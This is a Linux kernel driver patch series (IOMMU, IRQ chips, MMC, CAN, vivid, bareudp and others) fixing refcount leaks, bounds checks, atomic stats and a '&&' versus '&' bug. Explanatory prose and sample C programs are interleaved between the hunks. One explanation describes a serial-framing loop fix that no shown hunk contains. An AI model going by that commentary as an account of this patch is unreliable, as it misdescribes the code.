+@@ -586,7 +586,7 @@ static int ili251x_firmware_to_buffer(const struct firmware *fw,
+ 	 * once, copy them all into this buffer at the right locations, and then
+ 	 * do all operations on this linear buffer.
+ 	 */
+-	fw_buf = kzalloc(SZ_64K, GFP_KERNEL);
++	fw_buf = kvmalloc(SZ_64K, GFP_KERNEL);
+ 	if (!fw_buf)
+ 		return -ENOMEM;
+ 
+@@ -616,7 +616,7 @@ static int ili251x_firmware_to_buffer(const struct firmware *fw,
+ 	return 0;
+ 
+ err_big:
+-	kfree(fw_buf);
++	kvfree(fw_buf);
+ 	return error;
+ }
+ 
+@@ -859,7 +859,7 @@ static ssize_t ili210x_firmware_update_store(struct device *dev,
+ 	ili210x_hardware_reset(priv->reset_gpio);
+ 	dev_dbg(dev, "Firmware update ended, error=%i\n", error);
+ 	enable_irq(client->irq);
+-	kfree(fwbuf);
++	kvfree(fwbuf);
+ 	return error;
+ }
+ 
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index 4759f79ad7b94..345c161ffb27a 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1402,7 +1402,7 @@ int qi_submit_sync(struct intel_iommu *iommu, struct qi_desc *desc,
+ 	 */
+ 	writel(qi->free_head << shift, iommu->reg + DMAR_IQT_REG);
+ 
+-	while (qi->desc_status[wait_index] != QI_DONE) {
++	while (READ_ONCE(qi->desc_status[wait_index]) != QI_DONE) {
+ 		/*
+ 		 * We will leave the interrupts disabled, to prevent interrupt
+ 		 * context to queue another cmd while a cmd is already submitted
+diff --git a/drivers/iommu/sun50i-iommu.c b/drivers/iommu/sun50i-iommu.c
+index 5b585eace3d46..e8dc1a7d94911 100644
+--- a/drivers/iommu/sun50i-iommu.c
++++ b/drivers/iommu/sun50i-iommu.c
+@@ -449,6 +449,7 @@ static int sun50i_iommu_enable(struct sun50i_iommu *iommu)
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(3) |
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(4) |
+ 		    IOMMU_TLB_PREFETCH_MASTER_ENABLE(5));
++	iommu_write(iommu, IOMMU_BYPASS_REG, 0);
+ 	iommu_write(iommu, IOMMU_INT_ENABLE_REG, IOMMU_INT_MASK);
+ 	iommu_write(iommu, IOMMU_DM_AUT_CTRL_REG(SUN50I_IOMMU_ACI_NONE),
+ 		    IOMMU_DM_AUT_CTRL_RD_UNAVAIL(SUN50I_IOMMU_ACI_NONE, 0) |
+diff --git a/drivers/irqchip/irq-armada-370-xp.c b/drivers/irqchip/irq-armada-370-xp.c
+index ee18eb3e72b72..ab02b44a3b4ec 100644
+--- a/drivers/irqchip/irq-armada-370-xp.c
++++ b/drivers/irqchip/irq-armada-370-xp.c
+@@ -567,6 +567,10 @@ static struct irq_chip armada_370_xp_irq_chip = {
+ static int armada_370_xp_mpic_irq_map(struct irq_domain *h,
+ 				      unsigned int virq, irq_hw_number_t hw)
+ {
++	/* IRQs 0 and 1 cannot be mapped, they are handled internally */
++	if (hw <= 1)
++		return -EINVAL;
++
+ 	armada_370_xp_irq_mask(irq_get_irq_data(virq));
+ 	if (!is_percpu_irq(hw))
+ 		writel(hw, per_cpu_int_base +
+diff --git a/drivers/irqchip/irq-gic-v2m.c b/drivers/irqchip/irq-gic-v2m.c
+index 6e1ac330d7a60..414cd925064f4 100644
+--- a/drivers/irqchip/irq-gic-v2m.c
++++ b/drivers/irqchip/irq-gic-v2m.c
+@@ -438,12 +438,12 @@ static int __init gicv2m_of_init(struct fwnode_handle *parent_handle,
+ 
+ 		ret = gicv2m_init_one(&child->fwnode, spi_start, nr_spis,
+ 				      &res, 0);
+-		if (ret) {
+-			of_node_put(child);
++		if (ret)
+ 			break;
+-		}
+ 	}
+ 
++	if (ret && child)
++		of_node_put(child);
+ 	if (!ret)
+ 		ret = gicv2m_allocate_domains(parent);
+ 	if (ret)
+diff --git a/drivers/leds/leds-spi-byte.c b/drivers/leds/leds-spi-byte.c
+index 2bc5c99daf51a..6883d3ba382f9 100644
+--- a/drivers/leds/leds-spi-byte.c
++++ b/drivers/leds/leds-spi-byte.c
+@@ -91,7 +91,6 @@ static int spi_byte_probe(struct spi_device *spi)
+ 		dev_err(dev, "Device must have exactly one LED sub-node.");
+ 		return -EINVAL;
+ 	}
+-	child = of_get_next_available_child(dev_of_node(dev), NULL);
+ 
+ 	led = devm_kzalloc(dev, sizeof(*led), GFP_KERNEL);
+ 	if (!led)
+@@ -107,11 +106,13 @@ static int spi_byte_probe(struct spi_device *spi)
+ 	led->ldev.max_brightness = led->cdef->max_value - led->cdef->off_value;
+ 	led->ldev.brightness_set_blocking = spi_byte_brightness_set_blocking;
+ 
++	child = of_get_next_available_child(dev_of_node(dev), NULL);
+ 	state = of_get_property(child, "default-state", NULL);
+ 	if (state) {
+ 		if (!strcmp(state, "on")) {
+ 			led->ldev.brightness = led->ldev.max_brightness;
+ 		} else if (strcmp(state, "off")) {
++			of_node_put(child);
+ 			/* all other cases except "off" */
+ 			dev_err(dev, "default-state can only be 'on' or 'off'");
+ 			return -EINVAL;
+@@ -122,9 +123,12 @@ static int spi_byte_probe(struct spi_device *spi)
+ 
+ 	ret = devm_led_classdev_register(&spi->dev, &led->ldev);
+ 	if (ret) {
++		of_node_put(child);
+ 		mutex_destroy(&led->mutex);
+ 		return ret;
+ 	}
++
++	of_node_put(child);
+ 	spi_set_drvdata(spi, led);
+ 
+ 	return 0;
+diff --git a/drivers/md/dm-init.c b/drivers/md/dm-init.c
+index dc4381d683131..6e9e73a558740 100644
+--- a/drivers/md/dm-init.c
++++ b/drivers/md/dm-init.c
+@@ -213,8 +213,10 @@ static char __init *dm_parse_device_entry(struct dm_device *dev, char *str)
+ 	strscpy(dev->dmi.uuid, field[1], sizeof(dev->dmi.uuid));
+ 	/* minor */
+ 	if (strlen(field[2])) {
+-		if (kstrtoull(field[2], 0, &dev->dmi.dev))
++		if (kstrtoull(field[2], 0, &dev->dmi.dev) ||
++		    dev->dmi.dev >= (1 << MINORBITS))
+ 			return ERR_PTR(-EINVAL);
++		dev->dmi.dev = huge_encode_dev((dev_t)dev->dmi.dev);
+ 		dev->dmi.flags |= DM_PERSISTENT_DEV_FLAG;
+ 	}
+ 	/* flags */
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index a30461de3e844..d173ac80e01cf 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1038,8 +1038,11 @@ static int camss_of_parse_endpoint_node(struct device *dev,
+ 	struct v4l2_mbus_config_mipi_csi2 *mipi_csi2;
+ 	struct v4l2_fwnode_endpoint vep = { { 0 } };
+ 	unsigned int i;
++	int ret;
+ 
+-	v4l2_fwnode_endpoint_parse(of_fwnode_handle(node), &vep);
++	ret = v4l2_fwnode_endpoint_parse(of_fwnode_handle(node), &vep);
++	if (ret)
++		return ret;
+ 
+ 	csd->interface.csiphy_id = vep.base.port;
+ 
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-cap.c b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+index c0999581c599b..3864df45077d0 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-cap.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+@@ -113,8 +113,9 @@ static int vid_cap_queue_setup(struct vb2_queue *vq,
+ 		if (*nplanes != buffers)
+ 			return -EINVAL;
+ 		for (p = 0; p < buffers; p++) {
+-			if (sizes[p] < tpg_g_line_width(&dev->tpg, p) * h +
+-						dev->fmt_cap->data_offset[p])
++			if (sizes[p] < tpg_g_line_width(&dev->tpg, p) * h /
++					dev->fmt_cap->vdownsampling[p] +
++					dev->fmt_cap->data_offset[p])
+ 				return -EINVAL;
+ 		}
+ 	} else {
+@@ -1809,8 +1810,10 @@ int vidioc_s_edid(struct file *file, void *_fh,
+ 		return -EINVAL;
+ 	if (edid->blocks == 0) {
+ 		dev->edid_blocks = 0;
+-		v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, 0);
+-		v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, 0);
++		if (dev->num_outputs) {
++			v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, 0);
++			v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, 0);
++		}
+ 		phys_addr = CEC_PHYS_ADDR_INVALID;
+ 		goto set_phys_addr;
+ 	}
+@@ -1834,8 +1837,10 @@ int vidioc_s_edid(struct file *file, void *_fh,
+ 			display_present |=
+ 				dev->display_present[i] << j++;
+ 
+-	v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, display_present);
+-	v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, display_present);
++	if (dev->num_outputs) {
++		v4l2_ctrl_s_ctrl(dev->ctrl_tx_edid_present, display_present);
++		v4l2_ctrl_s_ctrl(dev->ctrl_tx_hotplug, display_present);
++	}
+ 
+ set_phys_addr:
+ 	/* TODO: a proper hotplug detect cycle should be emulated here */
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-out.c b/drivers/media/test-drivers/vivid/vivid-vid-out.c
+index 9f731f085179e..e96d3d014143f 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-out.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-out.c
+@@ -63,14 +63,16 @@ static int vid_out_queue_setup(struct vb2_queue *vq,
+ 		if (sizes[0] < size)
+ 			return -EINVAL;
+ 		for (p = 1; p < planes; p++) {
+-			if (sizes[p] < dev->bytesperline_out[p] * h +
+-				       vfmt->data_offset[p])
++			if (sizes[p] < dev->bytesperline_out[p] * h /
++					vfmt->vdownsampling[p] +
++					vfmt->data_offset[p])
+ 				return -EINVAL;
+ 		}
+ 	} else {
+ 		for (p = 0; p < planes; p++)
+-			sizes[p] = p ? dev->bytesperline_out[p] * h +
+-				       vfmt->data_offset[p] : size;
++			sizes[p] = p ? dev->bytesperline_out[p] * h /
++					vfmt->vdownsampling[p] +
++					vfmt->data_offset[p] : size;
+ 	}
+ 
+ 	if (vq->num_buffers + *nbuffers < 2)
+@@ -127,7 +129,7 @@ static int vid_out_buf_prepare(struct vb2_buffer *vb)
+ 
+ 	for (p = 0; p < planes; p++) {
+ 		if (p)
+-			size = dev->bytesperline_out[p] * h;
++			size = dev->bytesperline_out[p] * h / vfmt->vdownsampling[p];
+ 		size += vb->planes[p].data_offset;
+ 
+ 		if (vb2_get_plane_payload(vb, p) < size) {
+@@ -334,8 +336,8 @@ int vivid_g_fmt_vid_out(struct file *file, void *priv,
+ 	for (p = 0; p < mp->num_planes; p++) {
+ 		mp->plane_fmt[p].bytesperline = dev->bytesperline_out[p];
+ 		mp->plane_fmt[p].sizeimage =
+-			mp->plane_fmt[p].bytesperline * mp->height +
+-			fmt->data_offset[p];
++			mp->plane_fmt[p].bytesperline * mp->height /
++			fmt->vdownsampling[p] + fmt->data_offset[p];
+ 	}
+ 	for (p = fmt->buffers; p < fmt->planes; p++) {
+ 		unsigned stride = dev->bytesperline_out[p];
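Both vivid changes divide the per-plane size by vdownsampling, which the old sizing ignored. For a vertically subsampled plane the corrected formula is sizeimage = bytesperline * height / vdownsampling + data_offset; with assumed numbers:

    #include <stdio.h>

    int main(void)
    {
            unsigned int bytesperline = 640, height = 480;
            unsigned int vdownsampling = 2; /* e.g. the chroma plane of a 4:2:0 format */
            unsigned int data_offset = 0;

            /* 153600, half of the 307200 the old formula demanded */
            printf("%u\n", bytesperline * height / vdownsampling + data_offset);
            return 0;
    }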
+diff --git a/drivers/misc/vmw_vmci/vmci_resource.c b/drivers/misc/vmw_vmci/vmci_resource.c
+index 692daa9eff341..19c9d2cdd277b 100644
+--- a/drivers/misc/vmw_vmci/vmci_resource.c
++++ b/drivers/misc/vmw_vmci/vmci_resource.c
+@@ -144,7 +144,8 @@ void vmci_resource_remove(struct vmci_resource *resource)
+ 	spin_lock(&vmci_resource_table.lock);
+ 
+ 	hlist_for_each_entry(r, &vmci_resource_table.entries[idx], node) {
+-		if (vmci_handle_is_equal(r->handle, resource->handle)) {
++		if (vmci_handle_is_equal(r->handle, resource->handle) &&
++		    resource->type == r->type) {
+ 			hlist_del_init_rcu(&r->node);
+ 			break;
+ 		}
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index ec760ac0b3977..4b327b4815262 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -15,6 +15,19 @@
+ 
+ #include "card.h"
+ 
++static const struct mmc_fixup __maybe_unused mmc_sd_fixups[] = {
++	/*
++	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
++	 * This has so far only been observed on cards from 11/2019, while new
++	 * cards from 2023/05 do not exhibit this behavior.
++	 */
++	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
++		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
++		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
++
++	END_FIXUP
++};
++
+ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ #define INAND_CMD38_ARG_EXT_CSD  113
+ #define INAND_CMD38_ARG_ERASE    0x00
+@@ -53,15 +66,6 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("MMC32G", CID_MANFID_TOSHIBA, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_BLK_NO_CMD23),
+ 
+-	/*
+-	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
+-	 * This has so far only been observed on cards from 11/2019, while new
+-	 * cards from 2023/05 do not exhibit this behavior.
+-	 */
+-	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
+-		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
+-		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
+-
+ 	/*
+ 	 * Some SD cards lockup while using CMD23 multiblock transfers.
+ 	 */
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 246ce027ae0aa..30f6dbaa712ff 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -26,6 +26,7 @@
+ #include "host.h"
+ #include "bus.h"
+ #include "mmc_ops.h"
++#include "quirks.h"
+ #include "sd.h"
+ #include "sd_ops.h"
+ 
+@@ -1475,6 +1476,9 @@ static int mmc_sd_init_card(struct mmc_host *host, u32 ocr,
+ 			goto free_card;
+ 	}
+ 
++	/* Apply quirks prior to card setup */
++	mmc_fixup_device(card, mmc_sd_fixups);
++
+ 	err = mmc_sd_setup_card(host, card, oldcard != NULL);
+ 	if (err)
+ 		goto free_card;
+diff --git a/drivers/mmc/host/cqhci-core.c b/drivers/mmc/host/cqhci-core.c
+index 41e94cd141098..fe7a4eac9595c 100644
+--- a/drivers/mmc/host/cqhci-core.c
++++ b/drivers/mmc/host/cqhci-core.c
+@@ -612,7 +612,7 @@ static int cqhci_request(struct mmc_host *mmc, struct mmc_request *mrq)
+ 		cqhci_writel(cq_host, 0, CQHCI_CTL);
+ 		mmc->cqe_on = true;
+ 		pr_debug("%s: cqhci: CQE on\n", mmc_hostname(mmc));
+-		if (cqhci_readl(cq_host, CQHCI_CTL) && CQHCI_HALT) {
++		if (cqhci_readl(cq_host, CQHCI_CTL) & CQHCI_HALT) {
+ 			pr_err("%s: cqhci: CQE failed to exit halt state\n",
+ 			       mmc_hostname(mmc));
+ 		}
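
The one-character fix above is the classic logical-vs-bitwise AND mixup: `ctl && CQHCI_HALT` is a boolean conjunction that is true for any non-zero register value, so the halt bit was never actually tested. A standalone illustration, not part of the patch:

#include <assert.h>

#define CQHCI_HALT (1U << 0)	/* halt bit, as in the CQHCI register layout */

int main(void)
{
	unsigned int ctl = 0x2;	/* some unrelated bit set, HALT clear */

	/* Buggy form: any non-zero register value makes this true. */
	assert((ctl && CQHCI_HALT) == 1);

	/* Fixed form: tests the actual bit, which is clear here. */
	assert((ctl & CQHCI_HALT) == 0);
	return 0;
}
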
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index d0da4573b38cd..121e833efe289 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -2952,8 +2952,8 @@ static int dw_mci_init_slot(struct dw_mci *host)
+ 	if (host->use_dma == TRANS_MODE_IDMAC) {
+ 		mmc->max_segs = host->ring_size;
+ 		mmc->max_blk_size = 65535;
+-		mmc->max_seg_size = 0x1000;
+-		mmc->max_req_size = mmc->max_seg_size * host->ring_size;
++		mmc->max_req_size = DW_MCI_DESC_DATA_LENGTH * host->ring_size;
++		mmc->max_seg_size = mmc->max_req_size;
+ 		mmc->max_blk_count = mmc->max_req_size / 512;
+ 	} else if (host->use_dma == TRANS_MODE_EDMAC) {
+ 		mmc->max_segs = 64;
+diff --git a/drivers/mmc/host/sdhci-of-aspeed.c b/drivers/mmc/host/sdhci-of-aspeed.c
+index ba6677bf7372c..e60a2525e35b1 100644
+--- a/drivers/mmc/host/sdhci-of-aspeed.c
++++ b/drivers/mmc/host/sdhci-of-aspeed.c
+@@ -513,6 +513,7 @@ static const struct of_device_id aspeed_sdhci_of_match[] = {
+ 	{ .compatible = "aspeed,ast2600-sdhci", .data = &ast2600_sdhci_pdata, },
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(of, aspeed_sdhci_of_match);
+ 
+ static struct platform_driver aspeed_sdhci_driver = {
+ 	.driver		= {
+diff --git a/drivers/net/bareudp.c b/drivers/net/bareudp.c
+index 683203f87ae2b..277493e41b072 100644
+--- a/drivers/net/bareudp.c
++++ b/drivers/net/bareudp.c
+@@ -82,7 +82,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 
+ 		if (skb_copy_bits(skb, BAREUDP_BASE_HLEN, &ipversion,
+ 				  sizeof(ipversion))) {
+-			bareudp->dev->stats.rx_dropped++;
++			DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 			goto drop;
+ 		}
+ 		ipversion >>= 4;
+@@ -92,7 +92,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 		} else if (ipversion == 6 && bareudp->multi_proto_mode) {
+ 			proto = htons(ETH_P_IPV6);
+ 		} else {
+-			bareudp->dev->stats.rx_dropped++;
++			DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 			goto drop;
+ 		}
+ 	} else if (bareudp->ethertype == htons(ETH_P_MPLS_UC)) {
+@@ -106,7 +106,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				   ipv4_is_multicast(tunnel_hdr->daddr)) {
+ 				proto = htons(ETH_P_MPLS_MC);
+ 			} else {
+-				bareudp->dev->stats.rx_dropped++;
++				DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 				goto drop;
+ 			}
+ 		} else {
+@@ -122,7 +122,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				   (addr_type & IPV6_ADDR_MULTICAST)) {
+ 				proto = htons(ETH_P_MPLS_MC);
+ 			} else {
+-				bareudp->dev->stats.rx_dropped++;
++				DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 				goto drop;
+ 			}
+ 		}
+@@ -134,12 +134,12 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				 proto,
+ 				 !net_eq(bareudp->net,
+ 				 dev_net(bareudp->dev)))) {
+-		bareudp->dev->stats.rx_dropped++;
++		DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 		goto drop;
+ 	}
+ 	tun_dst = udp_tun_rx_dst(skb, family, TUNNEL_KEY, 0, 0);
+ 	if (!tun_dst) {
+-		bareudp->dev->stats.rx_dropped++;
++		DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 		goto drop;
+ 	}
+ 	skb_dst_set(skb, &tun_dst->dst);
+@@ -165,8 +165,8 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 						     &((struct ipv6hdr *)oiph)->saddr);
+ 		}
+ 		if (err > 1) {
+-			++bareudp->dev->stats.rx_frame_errors;
+-			++bareudp->dev->stats.rx_errors;
++			DEV_STATS_INC(bareudp->dev, rx_frame_errors);
++			DEV_STATS_INC(bareudp->dev, rx_errors);
+ 			goto drop;
+ 		}
+ 	}
+@@ -462,11 +462,11 @@ static netdev_tx_t bareudp_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	dev_kfree_skb(skb);
+ 
+ 	if (err == -ELOOP)
+-		dev->stats.collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 	else if (err == -ENETUNREACH)
+-		dev->stats.tx_carrier_errors++;
++		DEV_STATS_INC(dev, tx_carrier_errors);
+ 
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
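
DEV_STATS_INC() increments the device statistics with atomic operations, so concurrent datapaths cannot lose updates the way the plain `stats.rx_dropped++` read-modify-write can. A rough userspace analogue of the difference, using C11 atomics (a sketch, not the kernel implementation):

#include <stdatomic.h>
#include <pthread.h>
#include <stdio.h>

static unsigned long plain_ctr;		/* like dev->stats.rx_dropped++ */
static atomic_ulong atomic_ctr;		/* like DEV_STATS_INC() */

static void *worker(void *arg)
{
	(void)arg;
	for (int i = 0; i < 1000000; i++) {
		plain_ctr++;				/* racy read-modify-write */
		atomic_fetch_add(&atomic_ctr, 1);	/* never loses updates */
	}
	return NULL;
}

int main(void)
{
	pthread_t t[4];

	for (int i = 0; i < 4; i++)
		pthread_create(&t[i], NULL, worker, NULL);
	for (int i = 0; i < 4; i++)
		pthread_join(t[i], NULL);

	/* plain_ctr typically falls short of 4000000; atomic_ctr is exact. */
	printf("plain=%lu atomic=%lu\n", plain_ctr, atomic_load(&atomic_ctr));
	return 0;
}
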
+diff --git a/drivers/net/can/m_can/m_can.c b/drivers/net/can/m_can/m_can.c
+index 2de998b98cb5e..561f25cdad3fb 100644
+--- a/drivers/net/can/m_can/m_can.c
++++ b/drivers/net/can/m_can/m_can.c
+@@ -1815,7 +1815,7 @@ static int m_can_open(struct net_device *dev)
+ 	/* start the m_can controller */
+ 	err = m_can_start(dev);
+ 	if (err)
+-		goto exit_irq_fail;
++		goto exit_start_fail;
+ 
+ 	if (!cdev->is_peripheral)
+ 		napi_enable(&cdev->napi);
+@@ -1824,6 +1824,9 @@ static int m_can_open(struct net_device *dev)
+ 
+ 	return 0;
+ 
++exit_start_fail:
++	if (cdev->is_peripheral || dev->irq)
++		free_irq(dev->irq, dev);
+ exit_irq_fail:
+ 	if (cdev->is_peripheral)
+ 		destroy_workqueue(cdev->tx_wq);
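
The corrected loop bound scans the bytes that actually follow the current transmit position; the old `txpos + i + 1` indexing looked one byte too far, miscounting the chunk and reading past the valid range on the last byte. A sketch of the fixed scan, with a stub escape predicate standing in for the driver's framing rules:

#include <stdio.h>
#include <stdbool.h>

/* Hypothetical stand-in for the serial framing escape test. */
static bool needs_escape(unsigned char c)
{
	return c == 0x7e || c == 0x7d;	/* HDLC-style flag/escape bytes */
}

/* Length of the next chunk that can be sent verbatim: buf[pos] plus the
 * following bytes up to (but not including) the next escaped byte.
 */
static int next_chunk_len(const unsigned char *buf, int pos, int len)
{
	int i;

	/* Mirrors the fixed loop bound: i + pos < len, testing buf[pos + i]. */
	for (i = 1; i + pos < len; i++) {
		if (needs_escape(buf[pos + i]))
			break;
	}
	return i;
}

int main(void)
{
	unsigned char buf[] = { 0x01, 0x02, 0x7d, 0x03 };

	/* From offset 0: 0x01 and 0x02 are plain, 0x7d stops the scan. */
	printf("chunk len = %d\n", next_chunk_len(buf, 0, sizeof(buf)));
	return 0;
}
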
+diff --git a/drivers/net/can/spi/mcp251x.c b/drivers/net/can/spi/mcp251x.c
+index 79c4bab5f7246..8c56f85e87c1a 100644
+--- a/drivers/net/can/spi/mcp251x.c
++++ b/drivers/net/can/spi/mcp251x.c
+@@ -753,7 +753,7 @@ static int mcp251x_hw_wake(struct spi_device *spi)
+ 	int ret;
+ 
+ 	/* Force wakeup interrupt to wake device, but don't execute IST */
+-	disable_irq(spi->irq);
++	disable_irq_nosync(spi->irq);
+ 	mcp251x_write_2regs(spi, CANINTE, CANINTE_WAKIE, CANINTF_WAKIF);
+ 
+ 	/* Wait for oscillator startup timer after wake up */
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index 1665f78abb5c9..a9bafa96e2f92 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -867,18 +867,18 @@ static int mcp251xfd_get_berr_counter(const struct net_device *ndev,
+ 
+ static struct sk_buff *
+ mcp251xfd_alloc_can_err_skb(struct mcp251xfd_priv *priv,
+-			    struct can_frame **cf, u32 *timestamp)
++			    struct can_frame **cf, u32 *ts_raw)
+ {
+ 	struct sk_buff *skb;
+ 	int err;
+ 
+-	err = mcp251xfd_get_timestamp(priv, timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, ts_raw);
+ 	if (err)
+ 		return NULL;
+ 
+ 	skb = alloc_can_err_skb(priv->ndev, cf);
+ 	if (skb)
+-		mcp251xfd_skb_set_timestamp(priv, skb, *timestamp);
++		mcp251xfd_skb_set_timestamp_raw(priv, skb, *ts_raw);
+ 
+ 	return skb;
+ }
+@@ -889,7 +889,7 @@ static int mcp251xfd_handle_rxovif(struct mcp251xfd_priv *priv)
+ 	struct mcp251xfd_rx_ring *ring;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf;
+-	u32 timestamp, rxovif;
++	u32 ts_raw, rxovif;
+ 	int err, i;
+ 
+ 	stats->rx_over_errors++;
+@@ -924,14 +924,14 @@ static int mcp251xfd_handle_rxovif(struct mcp251xfd_priv *priv)
+ 			return err;
+ 	}
+ 
+-	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &timestamp);
++	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &ts_raw);
+ 	if (!skb)
+ 		return 0;
+ 
+ 	cf->can_id |= CAN_ERR_CRTL;
+ 	cf->data[1] = CAN_ERR_CRTL_RX_OVERFLOW;
+ 
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+@@ -948,12 +948,12 @@ static int mcp251xfd_handle_txatif(struct mcp251xfd_priv *priv)
+ static int mcp251xfd_handle_ivmif(struct mcp251xfd_priv *priv)
+ {
+ 	struct net_device_stats *stats = &priv->ndev->stats;
+-	u32 bdiag1, timestamp;
++	u32 bdiag1, ts_raw;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+ 	int err;
+ 
+-	err = mcp251xfd_get_timestamp(priv, &timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, &ts_raw);
+ 	if (err)
+ 		return err;
+ 
+@@ -1035,8 +1035,8 @@ static int mcp251xfd_handle_ivmif(struct mcp251xfd_priv *priv)
+ 	if (!cf)
+ 		return 0;
+ 
+-	mcp251xfd_skb_set_timestamp(priv, skb, timestamp);
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	mcp251xfd_skb_set_timestamp_raw(priv, skb, ts_raw);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+@@ -1049,7 +1049,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+ 	enum can_state new_state, rx_state, tx_state;
+-	u32 trec, timestamp;
++	u32 trec, ts_raw;
+ 	int err;
+ 
+ 	err = regmap_read(priv->map_reg, MCP251XFD_REG_TREC, &trec);
+@@ -1079,7 +1079,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 	/* The skb allocation might fail, but can_change_state()
+ 	 * handles cf == NULL.
+ 	 */
+-	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &timestamp);
++	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &ts_raw);
+ 	can_change_state(priv->ndev, cf, tx_state, rx_state);
+ 
+ 	if (new_state == CAN_STATE_BUS_OFF) {
+@@ -1110,7 +1110,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 		cf->data[7] = bec.rxerr;
+ 	}
+ 
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
+index 9e8e82cdba461..61b0d6fa52dd8 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
